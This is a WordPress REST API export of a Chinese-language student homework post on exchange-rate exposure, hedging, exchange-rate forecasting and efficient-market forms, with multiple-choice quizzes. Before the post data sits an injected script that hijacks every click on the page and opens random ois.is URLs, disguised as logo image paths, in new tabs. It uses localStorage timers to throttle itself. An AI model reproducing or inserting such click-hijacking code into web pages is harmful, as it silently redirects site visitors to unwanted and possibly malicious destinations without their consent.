<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":974,"date":"2023-04-26T16:48:07","date_gmt":"2023-04-26T08:48:07","guid":{"rendered":"https:\/\/edu.secda.info\/scu8154128\/?p=974"},"modified":"2023-04-27T01:25:50","modified_gmt":"2023-04-26T17:25:50","slug":"%e4%bd%9c%e6%a5%ad%e5%85%ad","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/scu8154128\/?p=974","title":{"rendered":"\u4f5c\u696d\u516d"},"content":{"rendered":"<h3>week11<\/h3>\n<h4>\u66dd\u96aaexposure<\/h4>\n<ul>\n<li>\u4ea4\u6613\u66dd\u96aa -&gt;\u4ea4\u6613\u6642\u8207\u7d50\u7b97\u6642\u7684\u532f\u7387\u4e0d\u540c\u800c\u5f15\u8d77\u61c9\u6536\u5916\u5e63\u6216\u61c9\u4ed8\u5916\u5e63\u7684\u672c\u570b\u8ca8\u5e63\u50f9\u503c\u8b8a\u52d5\u7684\u98a8\u96aa\u3002<\/li>\n<\/ul>\n<p>a. \u8861\u91cf\u65b9\u5f0f-&gt;\u7de8\u5236\u4ea4\u6613\u66b4\u9732\u8868(transaction exposure report)\u4f86\u8861\u91cf\u672a\u4f86\u4e00\u6bb5\u671f\u9593\u5167\u6bcf\u4e00\u7a2e\u5916\u5e63\u7684\u6de8\u4ea4\u6613\u66b4\u9732\u91cf\uff0c\u4e26\u9810\u4f30\u532f\u7387\u8b8a\u52d5\u6240\u5f15\u8d77\u7684\u640d\u76ca\u3002<\/p>\n<p>b. \u7ba1\u7406\u65b9\u5f0f<\/p>\n<p>(1)\u5951\u7d04\u907f\u96aa:\u4f7f\u7528\u91d1\u878d\u5de5\u5177\u907f\u96aa<\/p>\n<p>ex. \u9060\u671f\u5916\u532f\u907f\u96aa\u3001\u8ca8\u5e63\u5e02\u5834\u907f\u96aa\u3001\u5916\u532f\u671f\u8ca8\u907f\u96aa\u3001\u5916\u532f\u9078\u64c7\u6b0a\u907f\u96aa<\/p>\n<p>(2)\u64cd\u4f5c\u907f\u96aa:\u4f7f\u7528\u7d93\u71df\u7b56\u7565\u907f\u96aa<\/p>\n<p>*\u63d0\u524d\u8207\u5ef6\u5f8c(\u8207\u9280\u884c\u8ac7)\u00a0 \u00a0 \u00a0 \u00a01\u3001\u63d0\u524d : \u63d0\u524d\u6536\u56de\u61c9\u6536\u5e33\u6b3e\u6216\u652f\u4ed8\u61c9\u4ed8\u5e33\u6b3e\u3002<\/p>\n<p>2\u3001\u5ef6\u5f8c : \u5ef6\u5f8c\u6536\u56de\u61c9\u6536\u5e33\u6b3e\u6216\u652f\u4ed8\u61c9\u4ed8\u5e33\u6b3e\u3002<\/p>\n<p>*\u98a8\u96aa\u79fb\u8f49(\u8207\u5c0d\u624b\u8ac7)<\/p>\n<p>*\u98a8\u96aa\u62b5\u92b7<\/p>\n<p>*\u98a8\u96aa\u5206\u6524<\/p>\n<ul>\n<li>\u7d93\u6fdf\u66dd\u96aa -&gt;\u53c8\u7a31\u71df\u904b\u98a8\u96aa\uff0c\u662f\u6307\u4e0d\u53ef\u9810\u671f\u7684\u532f\u7387\u8b8a\u52d5\u5c0d\u4f01\u696d\u5e02\u5834\u50f9\u503c\u6240\u9020\u6210\u7684\u5f71\u97ff\u3002-&gt;\u6703\u5f71\u97ff\u516c\u53f8\u672a\u4f86\u73fe\u91d1\u6d41\u91cf\u73fe\u503c\u7684\u5c31\u53eb\u7d93\u6fdf\u66dd\u96aa\u3002\u6240\u6709\u4ea4\u6613\u90fd\u662f\u7d93\u6fdf\u66dd\u96aa\u3002<\/li>\n<\/ul>\n<p>*\u7d93\u6fdf\u66dd\u96aa\u6c7a\u5b9a\u56e0\u7d20<\/p>\n<p>(1)\u4f01\u696d\u5e02\u5834\u50f9\u503c\u7b49\u65bc\u672a\u4f86\u6240\u6709\u7372\u5229\u7684\u6298\u73fe\u503c\uff0c\u56e0\u6b64\u532f\u7387\u8b8a\u52d5\u6240\u5f15\u8d77\u7684\u7d93\u6fdf\u98a8\u96aa\u53ef\u4ee5\u70ba\u532f\u7387\u8b8a\u52d5\u5c0d\u4f01\u696d\u672a\u4f86\u6240\u6709\u7372\u5229\u6298\u73fe\u503c\u7684\u5f71\u97ff\u3002<\/p>\n<p>(2)\u4f01\u696d\u8f49\u79fb\u751f\u7522\u4ee5\u53ca\u7372\u53d6\u539f\u7269\u6599\u7684\u80fd\u529b\u3002<\/p>\n<p>*\u7d93\u6fdf\u66dd\u96aa\u7ba1\u7406-&gt;\u5728\u9762\u81e8\u532f\u7387\u8b8a\u52d5\u6642\uff0c\u7dad\u6301\u4f01\u696d\u7684\u7372\u5229\u7a69\u5b9a<\/p>\n<ul>\n<li>\u63db\u7b97\u98a8\u96aa-&gt;\u532f\u7387\u9762\u52d5\u5f15\u8d77\u4f01\u696d\u8ca1\u52d9\u5831\u8868\u9805\u76ee\u7684\u672c\u570b\u8ca8\u5e63\u50f9\u503c\u8b8a\u52d5\u7684\u98a8\u96aa\uff0c\u53c8\u7a31\u70ba\u6703\u8a08\u98a8\u96aa\u3002<\/li>\n<\/ul>\n<h4>\u4e09\u89d2\u5957\u5229<\/h4>\n<h4><img loading=\"lazy\" class=\"alignnone size-medium wp-image-975\" src=\"https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/04\/S__2678788-239x300.jpg\" alt=\"\" width=\"239\" height=\"300\" srcset=\"https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/04\/S__2678788-239x300.jpg 239w, https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/04\/S__2678788-638x800.jpg 638w, https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/04\/S__2678788-768x964.jpg 768w, https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/04\/S__2678788.jpg 977w\" sizes=\"(max-width: 239px) 100vw, 239px\" \/><\/h4>\n<h3>week12<\/h3>\n<h4>\u532f\u7387\u7684\u9810\u6e2c<\/h4>\n<p>*\u4e00\u822c\u91d1\u878d\u8cc7\u7522\u50f9\u683c\u9810\u6e2c\uff0c\u662f\u6307\u5831\u916c\u7387\u7684\u9810\u6e2c\uff0c\u5148\u9810\u6e2c\u5831\u916c\u7387\u518d\u4e58\u4e0a\u50f9\u683c\uff0c\u5f97\u5230\u50f9\u683c\u7684\u9810\u6e2c\u3002<\/p>\n<p>\u4ee5\u7d71\u8a08\u6a21\u578b\u4f86\u8aaa<br \/>\n1. \u5728\u6a6b\u65b7\u9762\u7684\u8ff4\u6b78\u6a21\u5f0f\u7528 predict<br \/>\n2.\u5728\u7e31\u8cab\u9762\u7684\u8ff4\u6b78\u6a21\u5f0f\u7528 forecast<\/p>\n<p>\u4ee5\u532f\u7387\u70ba\u4f8b\uff0c\u82e5\u662f\u8981\u9810\u6e2c\u672a\u4f86\u7684\u5373\u671f\u532f\u7387\uff0c\u548c\u6642\u9593\u6709\u95dc\uff0c\u5247\u6703\u7528forecasting\u3002<\/p>\n<p>\u25ce\u532f\u7387\u9810\u6e2c\u65b9\u6cd5<\/p>\n<p>1\u3001\u8a08\u91cf\u7d93\u6fdf\u9810\u6e2c\u6cd5<\/p>\n<p>-&gt;\u5229\u7528\u7d93\u6fdf\u7406\u8ad6\u754c\u5b9a\u532f\u7387\u53ca\u5176\u89e3\u91cb\u8b8a\u6578\u9593\u7684\u8ff4\u6b78\u5f0f\uff0c\u4ee5\u7d71\u8a08\u65b9\u6cd5\u8207\u6b77\u53f2\u8cc7\u6599\u4f86\u6c42\u51fa\u532f\u7387\u53ca\u5176\u89e3\u91cb\u8b8a\u6578\u9593\u7684\u95dc\u4fc2\uff0c\u518d\u9032\u4e00\u6b65\u9810\u6e2c\u3002<\/p>\n<p>\u6b65\u9a5f :<\/p>\n<p>(1)\u5229\u7528\u7d93\u6fdf\u7406\u8ad6\u78ba\u7acb\u532f\u7387\u6a21\u578b<\/p>\n<p>(2)\u4ee5\u7d71\u8a08\u65b9\u6cd5\u53ca\u6b77\u53f2\u8cc7\u6599\u6c42\u51fa\u8ff4\u6b78\u6a21\u578b\u76f8\u95dc\u4fc2\u6578<\/p>\n<p>(3)\u4ee5\u8868\u6c42\u51fa\u56de\u6b78\u6a21\u578b\u9810\u6e2c\u532f\u7387<\/p>\n<p>2\u3001\u6280\u8853\u5206\u6790<\/p>\n<p>&#8211;&gt;\u6839\u64da\u904e\u53bb\u7684\u532f\u7387\u8207\u5916\u532f\u6210\u4ea4\u91cf\u8cc7\u6599\uff0c\u627e\u51fa\u532f\u7387\u8b8a\u5316\u7684\u7279\u5b9a\u578b\u614b\u4f86\u9810\u6e2c\u532f\u7387\u7684\u672a\u4f86\u8b8a\u52d5\u3002<\/p>\n<p>3\u3001\u57fa\u672c\u5206\u6790<\/p>\n<p>&#8211;&gt;\u5229\u7528\u7d93\u6fdf\u7406\u8ad6\u5efa\u69cb\u56b4\u8b39\u7d93\u6fdf\u6a21\u578b\u4f86\u9810\u6e2c\u532f\u7387\u8b8a\u52d5\u3002<\/p>\n<ul>\n<li>\u5f31\u52e2\u6548\u7387\u5e02\u5834 : \u50f9\u683c\u628a\u904e\u53bb\u6b77\u53f2\u8cc7\u6599\u7684\u8cc7\u8a0a\u5df2\u7d93\u5145\u5206\u63a5\u9732\u3002-&gt;\u6280\u8853\u5206\u6790\u7121\u6548\u3001\u57fa\u672c\u9762\u5206\u6790\u53ca\u5167\u7dda\u6709\u6548<\/li>\n<li>\u534a\u5f37\u52e2\u6548\u7387\u5e02\u5834 : \u904e\u53bb\u4ee5\u53ca\u73fe\u5728\u5df2\u516c\u958b\u8cc7\u8a0a\u5df2\u5145\u5206\u53cd\u61c9\u65bc\u50f9\u683c\u3002-&gt;\u6280\u8853\u5206\u6790\u53ca\u57fa\u672c\u9762\u5206\u6790\u7121\u6548\u3001\u5167\u7dda\u6709\u6548\u3002<\/li>\n<li>\u5f37\u5f0f\u6548\u7387\u5e02\u5834 : \u904e\u53bb\u5373\u76ee\u524d\u6240\u6709\u5927\u773e\u6216\u79c1\u4e0b\u7684\u8cc7\u8a0a\u5df2\u5145\u5206\u53cd\u61c9\u65bc\u50f9\u683c\u4e0a\u3002-&gt;\u6280\u8853\u5206\u6790\u3001\u57fa\u672c\u9762\u5206\u6790\u3001\u5167\u7dda\u7686\u7121\u6548\u3002<\/li>\n<\/ul>\n<h3>week11\u9078\u64c7\u984c<\/h3>\n<p>1.\u4e0b\u5217\u54ea\u500b\u65b9\u6cd5\u53ef\u4ee5\u6e1b\u5c11\u4ea4\u6613\u66dd\u96aa\u98a8\u96aa? (C)<\/p>\n<p>(A )\u6295\u8cc7\u66f4\u591a\u8cc7\u91d1<\/p>\n<p>(B)\u9032\u884c\u66f4\u983b\u7e41\u7684\u4ea4\u6613<\/p>\n<p>(C)\u5206\u6563\u6295\u8cc7\u7d44\u5408<\/p>\n<p>(D) \u96c6\u4e2d\u6295\u8cc7\u7d44\u5408<\/p>\n<p>2.\u4ea4\u6613\u66dd\u96aa\u7684\u7ba1\u7406\u65b9\u6cd5\u4f55\u8005\u662f\u4f7f\u7528\u91d1\u878d\u5de5\u5177\u9032\u884c\u907f\u96aa\u7684\u65b9\u6cd5? (A)<\/p>\n<p>(A)\u5951\u7d04\u907f\u96aa<\/p>\n<p>(B)\u5de5\u5177\u907f\u96aa<\/p>\n<p>(C)\u64cd\u4f5c\u907f\u96aa<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u975e<\/p>\n<p>3.\u627f\u4e0a\u984c\uff0c\u4f55\u8005\u70ba\u4f7f\u7528\u7d93\u71df\u7b56\u7565\u9032\u884c\u907f\u96aa\u7684\u65b9\u6cd5? (C)<\/p>\n<p>(A)\u5951\u7d04\u907f\u96aa<\/p>\n<p>(B)\u5de5\u5177\u907f\u96aa<\/p>\n<p>(C)\u64cd\u4f5c\u907f\u96aa<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u975e<\/p>\n<p>4.\u4e0b\u5217\u4f55\u8005\u70ba\u5951\u7d04\u907f\u96aa? (D)<\/p>\n<p>(A)\u9060\u671f\u5916\u532f\u907f\u96aa<\/p>\n<p>(B)\u8ca8\u5e63\u5e02\u5834\u907f\u96aa<\/p>\n<p>(C)\u5916\u532f\u671f\u8ca8\u907f\u96aa<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u662f<\/p>\n<p>5.\u4e0b\u5217\u4f55\u7a2e\u70ba\u662f\u6307\u4ea4\u6613\u8207\u7d50\u7b97\u6642\u7684\u532f\u7387\u4e0d\u540c\u800c\u5f15\u8d77\u61c9\u6536\u5916\u5e63\u6216\u61c9\u4ed8\u5916\u5e63\u7684\u672c\u570b\u8ca8\u5e63\u50f9\u503c\u8b8a\u52d5\u7684\u98a8\u96aa? (B)<\/p>\n<p>(A)\u71df\u904b\u66dd\u96aa<\/p>\n<p>(B)\u4ea4\u6613\u66dd\u96aa<\/p>\n<p>(C)\u6703\u8a08\u66dd\u96aa<\/p>\n<p>(D)\u5e02\u5834\u66dd\u96aa<\/p>\n<p>6.\u7d93\u6fdf\u66dd\u96aa\u53c8\u7a31\u70ba\u4ec0\u9ebc? (A)<\/p>\n<p>(A)\u71df\u904b\u66dd\u96aa<\/p>\n<p>(B)\u4ea4\u6613\u66dd\u96aa<\/p>\n<p>(C)\u6703\u8a08\u66dd\u96aa<\/p>\n<p>(D)\u8ca1\u52d9\u66dd\u96aa<\/p>\n<p>7.\u5982\u4f55\u8861\u91cf\u672a\u4f86\u4e00\u6bb5\u671f\u9593\u5167\u6bcf\u4e00\u7a2e\u5916\u5e63\u7684\u6de8\u4ea4\u6613\u66b4\u9732\u91cf\uff0c\u4e26\u9810\u4f30\u532f\u7387\u8b8a\u52d5\u6240\u5f15\u8d77\u7684\u640d\u76ca? (B)<\/p>\n<p>(A)\u7de8\u5236\u7d9c\u5408\u640d\u76ca\u8868<\/p>\n<p>(B)\u7de8\u5236\u4ea4\u6613\u66b4\u9732\u8868<\/p>\n<p>(C)\u7de8\u5236\u73fe\u91d1\u6d41\u91cf\u8868<\/p>\n<p>(D)\u7de8\u5236\u8cc7\u7522\u8ca0\u50b5\u8868<\/p>\n<p>8.\u54ea\u4e00\u500b\u91d1\u878d\u5de5\u5177\u53ef\u4ee5\u7528\u6a19\u6e96\u5dee\u4f86\u8a08\u7b97\u907f\u96aa\u91d1\u984d\uff1f(A)<\/p>\n<p>(A)\u9078\u64c7\u6b0a<\/p>\n<p>(B) \u8ca8\u5e63\u5e02\u5834\u907f\u96aa<\/p>\n<p>(C) \u671f\u8ca8<\/p>\n<p>(D) \u9060\u671f\u5951\u7d04<\/p>\n<p>9.\u9060\u671f\u5916\u532f\u98a8\u96aa\u662f\u5728\u898f\u907f\u4f55\u7a2e\u98a8\u96aa? (A)<\/p>\n<p>(A)\u532f\u7387\u8b8a\u52d5<\/p>\n<p>(B)\u91d1\u878d\u6d77\u562f<\/p>\n<p>(C)\u901a\u8ca8\u81a8\u8139<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u662f<\/p>\n<p>10.\u4e0b\u5217\u4f55\u8005\u70ba\u64cd\u4f5c\u907f\u96aa?(D)<\/p>\n<p>(A)\u98a8\u96aa\u79fb\u8f49<\/p>\n<p>(B)\u98a8\u96aa\u62b5\u92b7<\/p>\n<p>(C)\u98a8\u96aa\u5206\u6524<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u662f<\/p>\n<h3>week12\u9078\u64c7\u984c<\/h3>\n<p>1.\u4ee5\u7d71\u8a08\u6a21\u578b\u4f86\u8aaa\uff0c\u6a6b\u65b7\u9762\u7684\u8ff4\u6b78\u6a21\u5f0f\u662f\u7528\u4e0b\u5217\u4f55\u8005? (A)<\/p>\n<p>(A)predict<\/p>\n<p>(B)forecast<\/p>\n<p>(C)forecasting<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u975e<\/p>\n<p>2.\u4ee5\u7d71\u8a08\u6a21\u578b\u4f86\u8aaa\uff0c\u7e31\u8cab\u9762\u7684\u8ff4\u6b78\u6a21\u5f0f\u662f\u7528\u4e0b\u5217\u4f55\u8005? (B)<\/p>\n<p>(A)predict<\/p>\n<p>(B)forecast<\/p>\n<p>(C)forecasting<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u975e<\/p>\n<p>3.\u4e0b\u5217\u54ea\u4e00\u500b\u5206\u6790\u65b9\u6cd5\u662f\u6839\u64da\u904e\u53bb\u7684\u532f\u7387\u8207\u5916\u532f\u6210\u4ea4\u91cf\u8cc7\u6599\uff0c\u627e\u51fa\u532f\u7387\u8b8a\u5316\u7684\u7279\u5b9a\u578b\u614b\u4f86\u9810\u6e2c\u532f\u7387\u7684\u672a\u4f86\u8b8a\u52d5? (A)<\/p>\n<p>(A)\u6280\u8853\u5206\u6790<\/p>\n<p>(B)\u57fa\u672c\u5206\u6790<\/p>\n<p>(C)\u7d93\u6fdf\u5206\u6790<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u975e<\/p>\n<p>4.\u4e0b\u5217\u54ea\u4e00\u500b\u5206\u6790\u65b9\u6cd5\u662f\u5229\u7528\u7d93\u6fdf\u7406\u8ad6\u5efa\u69cb\u56b4\u8b39\u7d93\u6fdf\u6a21\u578b\u4f86\u9810\u6e2c\u532f\u7387\u8b8a\u52d5? (B)<\/p>\n<p>(A)\u6280\u8853\u5206\u6790<\/p>\n<p>(B)\u57fa\u672c\u5206\u6790<\/p>\n<p>(C)\u7d93\u6fdf\u5206\u6790<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u975e<\/p>\n<p>5.\u4e0b\u5217\u4f55\u8005\u662f\u6548\u7387\u5e02\u5834\u5047\u8aaa\u7684\u5206\u985e? (D)<\/p>\n<p>(A) \u5f31\u5f0f\u6548\u7387\u5e02\u5834<\/p>\n<p>(B) \u534a\u5f37\u5f0f\u6548\u7387\u5e02\u5834<\/p>\n<p>(C) \u5f37\u5f0f\u6548\u7387\u5e02\u5834<\/p>\n<p>(D) \u4ee5\u4e0a\u7686\u662f<\/p>\n<p>6.\u4e0b\u5217\u4f55\u8005\u70ba\u532f\u7387\u9810\u6e2c\u65b9\u6cd5\u4e2d\u5e38\u7528\u7684\u6280\u8853\u5206\u6790\u6307\u6a19 ? (D)<\/p>\n<p>(A)\u96a8\u6a5f\u6307\u6a19<\/p>\n<p>(B)\u52d5\u91cf\u6307\u6a19<\/p>\n<p>(C)\u79fb\u52d5\u5e73\u5747<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u662f<\/p>\n<p>7.\u5f31\u5f0f\u6548\u7387\u5e02\u5834\u7684\u4f55\u9805\u5206\u6790\u7121\u6548?(A)<\/p>\n<p>(A) \u6280\u8853\u5206\u6790<\/p>\n<p>(B) \u57fa\u672c\u5206\u6790<\/p>\n<p>(C) \u5167\u7dda\u6d88\u606f<\/p>\n<p>(D) \u4ee5\u4e0a\u7686\u975e<\/p>\n<p>8.\u534a\u5f37\u5f0f\u6548\u7387\u5e02\u5834\u4f55\u9805\u5206\u6790\u6709\u6548?(C)<\/p>\n<p>(A) \u6280\u8853\u5206\u6790<\/p>\n<p>(B) \u57fa\u672c\u5206\u6790<\/p>\n<p>(C) \u5167\u7dda\u6d88\u606f<\/p>\n<p>(D) \u4ee5\u4e0a\u7686\u975e<\/p>\n<p>9.\u5f37\u5f0f\u6548\u7387\u5e02\u5834\u4f55\u8005\u5206\u6790\u7121\u6548?(D)<\/p>\n<p>(A) \u6280\u8853\u5206\u6790<\/p>\n<p>(B) \u57fa\u672c\u5206\u6790<\/p>\n<p>(C) \u5167\u7dda\u6d88\u606f<\/p>\n<p>(D) \u4ee5\u4e0a\u7686\u7121\u6548<\/p>\n<p>10.\u67d0\u4e00\u80a1\u5e02\u53ef\u6b63\u78ba\u4e14\u8fc5\u901f\u5730\u53cd\u6620\u6240\u6709\u5df2\u516c\u958b\u53ca\u904e\u53bb\u7684\u8cc7\u8a0a\uff0c\u5247\u8a72\u80a1\u5e02\u70ba\u4e0b\u5217\u4f55\u8005\u6548\u7387\u5047\u8aaa\uff1f(B)<\/p>\n<p>(A)\u5f31\u5f0f\u6548\u7387\u5e02\u5834<\/p>\n<p>(B)\u534a\u5f37\u5f0f\u6548\u7387\u5e02\u5834<\/p>\n<p>(C)\u5f37\u5f0f\u6548\u7387\u5e02\u5834<\/p>\n<p>(D)\u4ee5\u4e0a\u7686\u662f\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>week11 \u66dd\u96aaexposure \u4ea4\u6613\u66dd\u96aa -&gt;\u4ea4\u6613\u6642\u8207\u7d50\u7b97\u6642\u7684\u532f\u7387\u4e0d\u540c<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/posts\/974"}],"collection":[{"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=974"}],"version-history":[{"count":8,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/posts\/974\/revisions"}],"predecessor-version":[{"id":983,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/posts\/974\/revisions\/983"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=974"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=974"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=974"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}